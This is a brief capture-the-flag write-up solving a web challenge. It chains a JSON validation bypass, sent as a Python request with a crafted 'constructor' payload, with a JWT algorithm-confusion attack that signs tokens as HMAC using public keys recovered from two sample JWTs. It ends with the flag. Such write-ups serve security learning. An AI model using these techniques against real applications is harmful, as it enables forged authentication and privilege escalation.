There are two vulns here. A bypass to the JSON validation, and a JWT signing vulnerability. The first part is pretty simple. The app uses '"jwt-simple": "0.5.2"', which has a vulnerability allowing us to bypass the pattern validation, allowing us to gain a JWT token for a 'low privilege' user. r = requests.post(url + "checkin", json={"firstName": "a", "lastName": "b", "passport": "123456789", "ffp": "CA12345678", "extras": {"sssr" : {"sssr": "FQTU"}, "constructor": {"name":"Array"}} }) The JWT library is vulnerable to being signed as HMAC with the public key, a common vuln. However, we have no pubkey. I was stuck for ages, until I spotted (thanks Makelaris) https://blog.silentsignal.eu/2021/02/08/abusing-jwt-public-keys-without-the-public-key/ This provided a Docker image where I could simply provide two JWT's, modify the payload in the program and run it. It pulled out the paramaters, and generated 4 potential public keys, signing my data with each. Using this:
We get the flag:
union{I_<3_JS0N_4nD_th1ngs_wr4pp3d_in_JS0N}`